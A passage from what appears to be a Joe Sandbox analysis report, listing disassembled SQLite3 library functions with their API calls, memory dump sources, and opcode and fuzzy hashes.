                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E18465
                                                                                                                                            • sqlite3_malloc.SQLITE3 ref: 61E184FB
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E1842C
                                                                                                                                              • Part of subcall function 61E09B3D: sqlite3_mutex_enter.SQLITE3 ref: 61E09B5C
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E1868A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_enter
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 165182205-0
                                                                                                                                            • Opcode ID: 16952b67d7732fc4ada51d93540606116d4c71d1be5f29f7f7f9d00a378a9ca7
                                                                                                                                            • Instruction ID: aafd9ec4b20a39cee87902430ba3fa8e06fa1ccb72e96da7a1514644849b8d37
                                                                                                                                            • Opcode Fuzzy Hash: 16952b67d7732fc4ada51d93540606116d4c71d1be5f29f7f7f9d00a378a9ca7
                                                                                                                                            • Instruction Fuzzy Hash: 52A19275D04258CFCB04CFA9D484ADDBBF1BF88314F25852AE859AB348E774A945CF41
                                                                                                                                            Function 61E050B6 Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_strnicmp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1961171630-0
                                                                                                                                            • Opcode ID: 4152a2755d37966d6f30f6a983616001695ced2628f7d588fa17c454228850bc
                                                                                                                                            • Instruction ID: 1cd60eced02e175bcc69efc76f2b3cd0355e64b47221b08c0a6e24e201a49c35
                                                                                                                                            • Opcode Fuzzy Hash: 4152a2755d37966d6f30f6a983616001695ced2628f7d588fa17c454228850bc
                                                                                                                                            • Instruction Fuzzy Hash: 2151B37544968589EB214ED884823A9BFE79F4370FF78D41AD4A48B251C37EC0BA8A53
                                                                                                                                            Function 61E4D8DF Relevance: 7.7, APIs: 5, Instructions: 157COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E4DB8A), ref: 61E4D908
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E4DB8A), ref: 61E4DA95
                                                                                                                                            • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E4DB8A), ref: 61E4DAA7
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E4DABE
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E4DAC6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_freesqlite3_mutex_leave$sqlite3_mutex_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2921195555-0
                                                                                                                                            • Opcode ID: d6fb389a4a36b59413c207fac5cbc38a44dbd5d29e5d8592e3f5a13460e77c1a
                                                                                                                                            • Instruction ID: 9331b0756bce0110006757d11a21ca1866651c1f47a768e15edfcfbf6d05531e
                                                                                                                                            • Opcode Fuzzy Hash: d6fb389a4a36b59413c207fac5cbc38a44dbd5d29e5d8592e3f5a13460e77c1a
                                                                                                                                            • Instruction Fuzzy Hash: DB519C78A046428BDB10DF69D88075AB7B2BF94318F29C97CCC99DB305D774E856CB90
                                                                                                                                            Function 61E4D7D0 Relevance: 7.6, APIs: 5, Instructions: 99COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 61E13C8E: sqlite3_mutex_try.SQLITE3(?,00000000,?,61E13CF0), ref: 61E13C2E
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E4D831
                                                                                                                                            • sqlite3_mutex_free.SQLITE3 ref: 61E4D872
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E4D882
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E4D8B1
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E4D8D0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1894464702-0
                                                                                                                                            • Opcode ID: 6c4143b63593bf9ad8a946237f42ef24afd1bc7d5de4cbacf81ece55ffcc6fe2
                                                                                                                                            • Instruction ID: 9ff93e042b182cdcff4ebbe447dec40cdedfb1941d05b425af29d4af7ad67ad7
                                                                                                                                            • Opcode Fuzzy Hash: 6c4143b63593bf9ad8a946237f42ef24afd1bc7d5de4cbacf81ece55ffcc6fe2
                                                                                                                                            • Instruction Fuzzy Hash: 47315274B046428BEB14DFBAD4C061AB7F5BFE9318B25C46DD848CB319EB31D8818B85
                                                                                                                                            Function 61E1B08D Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_malloc.SQLITE3 ref: 61E1B09D
                                                                                                                                              • Part of subcall function 61E17EE8: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17BC9,?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17EF0
                                                                                                                                            • memcmp.MSVCRT ref: 61E1B10F
                                                                                                                                            • memcmp.MSVCRT ref: 61E1B134
                                                                                                                                            • memcmp.MSVCRT ref: 61E1B165
                                                                                                                                            • memcmp.MSVCRT ref: 61E1B191
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcmp$sqlite3_initializesqlite3_malloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 40721531-0
                                                                                                                                            • Opcode ID: aab163ae88a6b47f64915cecefa7d16a99da593be04877be4fd492136e5166d2
                                                                                                                                            • Instruction ID: 34956e3a23004624bfcf072aa5bc559f41bff17cb2ac7b56278acc3f98de0b10
                                                                                                                                            • Opcode Fuzzy Hash: aab163ae88a6b47f64915cecefa7d16a99da593be04877be4fd492136e5166d2
                                                                                                                                            • Instruction Fuzzy Hash: CD313E71F082458BE7049FA9C58235ABBF5FFC8748F26C42DE8488B349D775D8468B52
                                                                                                                                            Function 61E281EF Relevance: 7.6, APIs: 5, Instructions: 90COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_log.SQLITE3 ref: 61E2821D
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,61E2832F), ref: 61E28231
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E2832F), ref: 61E28259
                                                                                                                                            • sqlite3_log.SQLITE3 ref: 61E28277
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E282AD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_logsqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1015584638-0
                                                                                                                                            • Opcode ID: 03fb36ac5f7ef367229dab55092dbbfcf19f89265288fc896b8f68732d7b25e8
                                                                                                                                            • Instruction ID: f083f19a711bca75dc24dc2b25f2abd40f81669102a6c8d7ee5141643e67ea9c
                                                                                                                                            • Opcode Fuzzy Hash: 03fb36ac5f7ef367229dab55092dbbfcf19f89265288fc896b8f68732d7b25e8
                                                                                                                                            • Instruction Fuzzy Hash: D031F672609650CBDB009FB8C594B4977E0EF8A729F28C469E8448F359E774C881DB42
                                                                                                                                            Function 61E42EB1 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E42EC6
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E42ED1
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E42FAD
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E42FB8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1477753154-0
                                                                                                                                            • Opcode ID: 4d08b4b0744c94af8c69606ddf20bc083fc9507ffdc76abc9c8576f56220c171
                                                                                                                                            • Instruction ID: 92ea79550fb683c13df4cd00447746ea460fc264249a9ff079073c68f4886c3d
                                                                                                                                            • Opcode Fuzzy Hash: 4d08b4b0744c94af8c69606ddf20bc083fc9507ffdc76abc9c8576f56220c171
                                                                                                                                            • Instruction Fuzzy Hash: 5F316FB06086428BD705AF78E48071ABBE1FF94318F64C55EE898CB345DB74E891CB92
                                                                                                                                            Function 61E331FC Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_initialize.SQLITE3 ref: 61E3320A
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E179B6
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21778), ref: 61E179EA
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17D35
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E33222
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E33245
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E33289
                                                                                                                                            • sqlite3_memory_used.SQLITE3 ref: 61E3328E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_configsqlite3_initializesqlite3_memory_used
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2853221962-0
                                                                                                                                            • Opcode ID: 23a312c25d7d69ec100c6eaca2bc4d67e163e33603f4fee62feb3545c52d59e3
                                                                                                                                            • Instruction ID: 7b269cff542e65450cd2c5f2333cdb308ff48a12bd72d524f1cd8a12828694f9
                                                                                                                                            • Opcode Fuzzy Hash: 23a312c25d7d69ec100c6eaca2bc4d67e163e33603f4fee62feb3545c52d59e3
                                                                                                                                            • Instruction Fuzzy Hash: DE113A70F54A159BCB04DFADD44195D77E2BFCA614B24C92AE864CB354D770E881CB80
                                                                                                                                            Function 61E84DD0 Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32 ref: 61E84E09
                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E84E1A
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 61E84E22
                                                                                                                                            • GetTickCount.KERNEL32 ref: 61E84E2A
                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E84E39
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                            • Opcode ID: edc190cf6ccea5b034b8b52c38e23706817e51787202263aeae1b29e9c74a88f
                                                                                                                                            • Instruction ID: 59811b3cc275b292c353d556c25968ec234f7859ed60cc3c12aeb49eda3c3ac5
                                                                                                                                            • Opcode Fuzzy Hash: edc190cf6ccea5b034b8b52c38e23706817e51787202263aeae1b29e9c74a88f
                                                                                                                                            • Instruction Fuzzy Hash: 1211A3B59583108FCB00EFB8E58864BBBE4FB89664F010D3AE544C7310DB35D8C88B92
                                                                                                                                            Function 61E0A912 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,61E1431A), ref: 61E0A93C
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,61E1431A), ref: 61E0A978
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,61E1431A), ref: 61E0A991
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,61E1431A), ref: 61E0A9A4
                                                                                                                                            • sqlite3_free.SQLITE3(?,?,?,61E1431A), ref: 61E0A9AC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 251237202-0
                                                                                                                                            • Opcode ID: f3eda28d23e30153da514b0515e133efb3a21bf7768b25a5cf77283df2ad434e
                                                                                                                                            • Instruction ID: 31ff0ee0dadd24cba0ff49ae801f0855a413db074d1c01163b8e42fbc3e77d9e
                                                                                                                                            • Opcode Fuzzy Hash: f3eda28d23e30153da514b0515e133efb3a21bf7768b25a5cf77283df2ad434e
                                                                                                                                            • Instruction Fuzzy Hash: D911F774AA4A508FCF00AFB9C29452477F5FF8A34AB654C2BD48887320E735C4D0CB52
                                                                                                                                            Function 61E2647C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_free$sqlite3_win32_is_nt
                                                                                                                                            • String ID: winAccess
                                                                                                                                            • API String ID: 2284118020-3605117275
                                                                                                                                            • Opcode ID: 3eb50924d1dc64f57ceec2a0988e9aedb22e7a9a8ffae301b97b5dbe59445320
                                                                                                                                            • Instruction ID: 9305b22a626490086356d0e63f9d1042eab72bb6e7d3408aa89d3e803fb4bbee
                                                                                                                                            • Opcode Fuzzy Hash: 3eb50924d1dc64f57ceec2a0988e9aedb22e7a9a8ffae301b97b5dbe59445320
                                                                                                                                            • Instruction Fuzzy Hash: 8B318171948685CFDB00DFA8C8A439EB7F1BB89328F25CA28EC6597384D774D846CB51
                                                                                                                                            Function 61E1A253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_malloc.SQLITE3 ref: 61E1A271
                                                                                                                                              • Part of subcall function 61E17EE8: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17BC9,?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17EF0
                                                                                                                                            • sqlite3_realloc.SQLITE3 ref: 61E1A2BF
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E1A2D5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
